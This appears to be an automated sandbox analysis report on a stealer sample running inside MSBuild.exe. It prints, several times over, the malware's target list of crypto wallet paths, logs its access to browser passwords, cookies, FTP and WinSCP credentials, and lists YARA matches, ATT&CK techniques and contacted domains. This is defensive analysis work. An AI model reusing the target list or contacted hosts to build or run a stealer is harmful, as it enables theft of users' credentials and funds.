Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4788, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4788, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC30C40 sqlite3_bind_zeroblob,	2_2_6CC30C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC30D60 sqlite3_bind_parameter_name,	2_2_6CC30D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB58EA0 sqlite3_clear_bindings,	2_2_6CB58EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6CC30B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB56410 bind,WSAGetLastError,	2_2_6CB56410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	511 Process Injection	3 Obfuscated Files or Information	1 Credentials in Registry	11 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	55 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	161 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Virtualization/Sandbox Evasion	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	511 Process Injection	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\a43486128347[1].exe	100%	Joe Sandbox ML
C:\ProgramData\AKEGIIJDGH.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sql[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://mozilla.org0/	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
http://cowod.hopto.org/	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
nsdm.cumpar-auto-orice-tip.ro	147.45.44.104	true	false	unknown
t.me	149.154.167.99	true	true	unknown
mathcucom.sbs	188.114.96.3	true	true	unknown
sergei-esenin.com	172.67.206.204	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
